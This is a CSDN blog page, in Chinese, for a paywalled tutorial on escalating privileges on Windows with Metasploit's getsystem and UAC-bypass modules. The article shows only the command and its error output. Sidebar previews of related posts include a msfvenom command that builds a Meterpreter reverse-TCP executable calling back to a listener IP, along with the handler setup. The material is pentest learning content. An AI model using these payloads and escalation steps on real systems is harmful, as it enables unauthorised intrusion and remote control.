msf之提权操作

最新推荐文章于 2025-05-10 21:12:36 发布
最新推荐文章于 2025-05-10 21:12:36 发布
阅读量2.7k 收藏 9
点赞数 1
CC 4.0 BY-SA版权
分类专栏: web安全 Linux kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44902875/article/details/104717496
本文介绍了在Windows系统中利用Metasploit(MSF)框架进行提权的操作过程,包括使用getsystem命令获取最高权限时遇到的UAC(用户账户控制)问题,以及尝试不同模块和payload来绕过UAC并提升权限。虽然初始尝试在x64系统上未成功,但最终找到了一个适用于x64系统的有效payload,实现了无需用户交互的系统权限提升。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

愿疫情早日结束,重返校园奋斗
使用getsystem来获得最高权限

getsystem

发现却爆出这样的错误

[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

最低0.47元/天 解锁文章

200万优质内容无限畅学
网络安全系列&网安实践系列:利用MSF对MYSQL进行简单的UDF
weixin_54626591的博客
10-23 244
利用MSF对MYSQL进行简单的UDF
操作系统升(十三)之绕过UAC-MSF和CS绕过UAC
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-25 1629
该模块会创建一个可执行文件,目标机器会运行一个发起限请求的程序,示用户是否要继续运行,如果用户选择继续运行程序,就会返回一个system限的shell。这个模块对用户没有要求,点击通过即可,但是会创建一个恶意文件,对该文件进行免杀即可。使用该模块的使用,当前用户必须是管理员组中的用户,UAC为默认设置。拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC。执行添加用户的命令时显示拒绝访问。使用CS自带的插件进行绕过后可以完成添加用户的命令。生成一个MSF的SHELL。
【网络安全】 MSF
一直被模仿,从未被超越
03-15 1343
学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。1、当我们通过MSF成功登录靶机时,进行时如果报如下,表示没有拿到系统限。5、我们找到一个漏洞,注意:这里是每个漏洞都可以成功,要多试几个。6、再次进行渗透,成功出现meterpreter ,代表成功。3、设置 Session。2、使用本地漏洞模块。
钓鱼网站+bypassuac
Jinmindong
02-20 1652
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
【详解】MSF
最新发布
牛肉胡辣汤
05-10 1100
Metasploit Framework (MSF) 是一个强大的开源渗透测试框架,广泛用于安全评估和漏洞研究。在渗透测试中,获取目标系统的高限是攻击者的主要目标之一。本文将探讨如何利用MSF进行操作,帮助渗透测试人员更好地理解系统安全。
渗透测试学习笔记之案例三
Fly_鹏程万里
07-06 3220
0x00 前言看到了少小伙伴似乎对渗透测试学习笔记系列文章有点兴趣,今天,笔者刚好抽空继续来写写吧!0x01 案例分析实验环境:目标靶机:10.11.1.0/24攻击机:Kali Linux (10.11.0.90)渗透过程:我们今天选取的目标靶机的IP为10.11.1.13。废话多说,依旧nmap做端口探测。# nmap -sS -sV -p 1-1024 -Pn 10.11.1.13 S...
msf生成木马抓取hash值
z65535的博客
04-21 731
结果显示:利用bypassuac漏洞模块对目标主机发起了攻击,成功绕过UAC限制,“Meterpreter session 2 opened ”–表明已经开通了192.168.88.132:4444和192.168.88.137:64588的新会话连接2。5.先用background把当前会话挂起,切换到msf目录下使用bupassuac模块来绕过uac的限制(这个方法比较看运气有可能成功,也有可能失败,需要多试几次),结果可以看到返回了多条可利用的漏洞模块信息。4.尝试(还是行,接着在换个方法)
Metasploit学习笔记(六)——Meterpreter后渗透之Hash攻击(包含Mimikatz)
Zichel77的博客
10-09 3361
针对WIN7,还是用永恒之蓝。
MSF操作
快吃小蛋糕吧的博客
10-30 1281
最近有个问题苦恼了我很久,“msf”是否可以控制多台服务器,怎么通过“msf”进行操作? 这里我直接开启了两台win7SP1X64的主机,通过运行后门的方式获得shell,这里生成shell的步骤略过。 获得服务器shell 首先我们在kali里面开启msf并调用exploit/multi/handler msf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 e.
Windows---MSF/令牌窃取/系统服务限配置错误
qq_40012781的博客
07-02 2507
是指把普通用户的限进行升至高限的过程,也叫特
msf问题
2302_77302329的博客
05-11 258
getsystem
meterpreter之getsystem命令详解
redwand的博客
07-23 9296
meterpreter shell是msf上集成的一组功能强大的shell集合,当我们获取一个反弹的meterpreter shell时,可以轻松的通过各种命令对靶机进行控制。熟悉的meterpreter的同学都清楚,其中有一个getsystem命令,帮助文档说明是用的,没有更详细的说明,很多人会误解为这是meterpreter的一键工具,但每次输入这个命令,都会爆出各种“incorrect“和”denied“,本文将通过理论和实验说明此命令的适用环境及过程。
【网络安全】内网渗透(二):
wuli1024的博客
01-06 1864
本文将会介绍,主要通过三种方式:高程序运行级别,UAC 绕过,利用漏洞进行
Metasploit - bypassuac
Nixawk
11-17 1316
Download: checkprivInstallation: cp checkpriv.rb /opt/metasploit-framework/scripts/meterpreter/checkpriv.rbmeterpreter > run checkpriv [*] Admin token: false [*] Running as SYSTEM: false [*] UAC Enab
windows升总结
m0_66458291的博客
03-31 1457
本文总结了常见的windows的几种方式如定时任务、sc、PSExec、进程迁移、烂土豆、passUAC、DLL劫持、带引号的安全路径问题、修改服务程序的执行路径等等
windows的几种姿势
weixin_44300286的博客
09-07 4582
一、工具 1、msf 准备阶段: 用msfvenom生成一个马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.112 lport=4444 -f exe > 3.exe 然后用msf开启一个监听: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.112 set lport 4444 expl
升—UAC绕过&DLL劫持&未引号路径&可控服务
2301_76227305的博客
04-21 895
以上呢基本就是Windows常见的方式了,其中UAC绕过并是用来的,而是为了解决过程中遇到的问题罢了。至此Windows告一段落最后,以上仅为个人的拙见,如何有对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
使用MSF进行(windows、linux、wesng使用)
热门推荐
Love&Share
11-22 2万+
文章目录MSF Windows反弹shellEND推荐阅读MSF Linux反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows 靶机: Win server2003 + iis(已.
[Linux相关] mount(2) system call failed: Operation not supported 解决方案
少侠的专栏
05-15 1万+
新装了linux 18.04后, 挂载其他盘时,遇到了如下错误 $sudo mount -t cifs -o username=xxx //172.16.x.xxx/SW_Test/ /media/SW_TEST mount: /media/SW_TEST: mount(2) system call failed: Operation not supported. 后发现缺少 cifs-util...
msf linux
09-17
在进行kali对linux的渗透攻击时,可以利用MSF进行操作。有几种方法可以实现这个目标。 首先,可以利用MSF本身存在的后门漏洞进行攻击。这样可以获得对linux系统的访问限,并进一步。 其次,可以使用攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值